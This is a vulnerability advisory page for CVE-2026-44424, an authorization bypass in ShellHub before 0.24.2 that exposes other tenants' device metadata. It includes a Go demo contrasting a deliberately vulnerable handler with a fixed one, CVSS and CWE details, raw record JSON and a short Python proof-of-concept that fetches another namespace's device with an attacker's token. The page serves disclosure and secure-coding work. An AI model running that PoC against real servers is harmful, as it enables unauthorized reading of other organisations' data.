Security Vulnerability Report
CVE-2026-44424 CVSS 6.5 MEDIUM

CVE-2026-44424

Published: 2026-05-13 22:16:44
Last Modified: 2026-05-14 16:44:56

Description

ShellHub is a centralized SSH gateway. Prior to 0.24.2, GET /api/devices/:uid returns the full device object whenever the caller is authenticated, without verifying that the device belongs to the caller's namespace (tenant). Any authenticated user (JWT or API Key) who knows or can guess a device UID can read device metadata from any other namespace. This vulnerability is fixed in 0.24.2.
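The defect class here is a missing tenant scope on a lookup keyed by a caller-controlled identifier. The following Go example is added to this report to illustrate that failure mode and its fix side by side; it is not ShellHub's code, and the handler shapes, the device store, the tenant header `X-Demo-Tenant` and the sample UIDs/tenant names are all constructed for the demo (ShellHub derives the namespace from the JWT or API key, not from a header).

```go
package main

import (
	"encoding/json"
	"fmt"
	"net/http"
	"net/http/httptest"
	"strings"
)

// Device is a trimmed-down stand-in for the device object the API returns.
type Device struct {
	UID      string `json:"uid"`
	Name     string `json:"name"`
	TenantID string `json:"tenant_id"`
}

// Constructed sample data: two devices in two different namespaces (tenants).
var devices = map[string]Device{
	"aaaa1111": {UID: "aaaa1111", Name: "edge-router", TenantID: "tenant-A"},
	"bbbb2222": {UID: "bbbb2222", Name: "build-box", TenantID: "tenant-B"},
}

// tenantFromRequest stands in for the namespace a real gateway would derive
// from the authenticated JWT / API key. A header is used here purely for the
// demo (assumption, not ShellHub's mechanism); empty means "not authenticated".
func tenantFromRequest(r *http.Request) string {
	return r.Header.Get("X-Demo-Tenant")
}

func uidFromPath(r *http.Request) string {
	return strings.TrimPrefix(r.URL.Path, "/api/devices/")
}

// vulnerableHandler mirrors the pre-0.24.2 behaviour described in the advisory:
// any authenticated caller gets any device by UID, with no namespace check.
func vulnerableHandler(w http.ResponseWriter, r *http.Request) {
	if tenantFromRequest(r) == "" {
		http.Error(w, "unauthorized", http.StatusUnauthorized)
		return
	}
	dev, ok := devices[uidFromPath(r)]
	if !ok {
		http.Error(w, "not found", http.StatusNotFound)
		return
	}
	json.NewEncoder(w).Encode(dev)
}

// fixedHandler scopes the lookup to the caller's tenant. A device that exists
// in another namespace is answered exactly like a non-existent one (404, not
// 403), so the endpoint cannot be used as an oracle for which UIDs exist.
func fixedHandler(w http.ResponseWriter, r *http.Request) {
	tenant := tenantFromRequest(r)
	if tenant == "" {
		http.Error(w, "unauthorized", http.StatusUnauthorized)
		return
	}
	dev, ok := devices[uidFromPath(r)]
	if !ok || dev.TenantID != tenant {
		http.Error(w, "not found", http.StatusNotFound)
		return
	}
	json.NewEncoder(w).Encode(dev)
}

// fetch issues GET /api/devices/<uid> as the given tenant ("" = no auth)
// against a handler and returns the HTTP status code.
func fetch(h http.HandlerFunc, tenant, uid string) int {
	req := httptest.NewRequest(http.MethodGet, "/api/devices/"+uid, nil)
	if tenant != "" {
		req.Header.Set("X-Demo-Tenant", tenant)
	}
	rec := httptest.NewRecorder()
	h(rec, req)
	return rec.Code
}

func main() {
	handlers := []struct {
		name string
		h    http.HandlerFunc
	}{
		{"vulnerable", vulnerableHandler},
		{"fixed", fixedHandler},
	}
	for _, tc := range handlers {
		fmt.Printf("%-10s own device: %d  cross-tenant: %d  unauthenticated: %d\n",
			tc.name,
			fetch(tc.h, "tenant-A", "aaaa1111"),
			fetch(tc.h, "tenant-A", "bbbb2222"),
			fetch(tc.h, "", "bbbb2222"))
	}
}
```

The cross-tenant column is the one the advisory is about: the vulnerable handler returns 200 for tenant-A reading tenant-B's device, the fixed one returns 404. Doing the tenant filter inside the lookup (rather than fetching first and checking afterwards) is the pattern to look for in review; a post-fetch check that returns 403 still leaks which UIDs exist.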

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
Weakness
CWE-639 (Authorization Bypass Through User-Controlled Key)

Configurations (Affected Products)

No CPE configuration data has been published for this record yet (its status is still "Undergoing Analysis"). The affected range stated in the advisory is:

ShellHub < 0.24.2 (fixed in 0.24.2)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. It sends a single authenticated GET to the device endpoint using a token from one namespace and a device UID from another; a 200 with a device body indicates the cross-namespace read described above.
python

import requests

# PoC for CVE-2026-44424: ShellHub IDOR on GET /api/devices/:uid
# Attacker needs a valid JWT or API Key for any namespace, plus a
# device UID that belongs to a different namespace.
target_url = "https://<shellhub-domain>/api/devices/<target_device_uid>"
headers = {
    "Authorization": "Bearer <attacker_valid_token>",
    "Content-Type": "application/json",
}

response = requests.get(target_url, headers=headers)
if response.status_code == 200:
    print("[+] Exploit Successful! Leaked Device Data:")
    print(response.json())
else:
    print(f"[-] Request failed with status code: {response.status_code}")

References

https://github.com/shellhub-io/shellhub/security/advisories/GHSA-j72x-xfwg-783f (GitHub Security Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-44424", "sourceIdentifier": "[email protected]", "published": "2026-05-13T22:16:44.257", "lastModified": "2026-05-14T16:44:55.820", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "ShellHub is a centralized SSH gateway. Prior to 0.24.2, GET /api/devices/:uid returns the full device object whenever the caller is authenticated, without verifying that the device belongs to the caller's namespace (tenant). Any authenticated user (JWT or API Key) who knows or can guess a device UID can read device metadata from any other namespace. This vulnerability is fixed in 0.24.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://github.com/shellhub-io/shellhub/security/advisories/GHSA-j72x-xfwg-783f", "source": "[email protected]"}, {"url": "https://github.com/shellhub-io/shellhub/security/advisories/GHSA-j72x-xfwg-783f", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}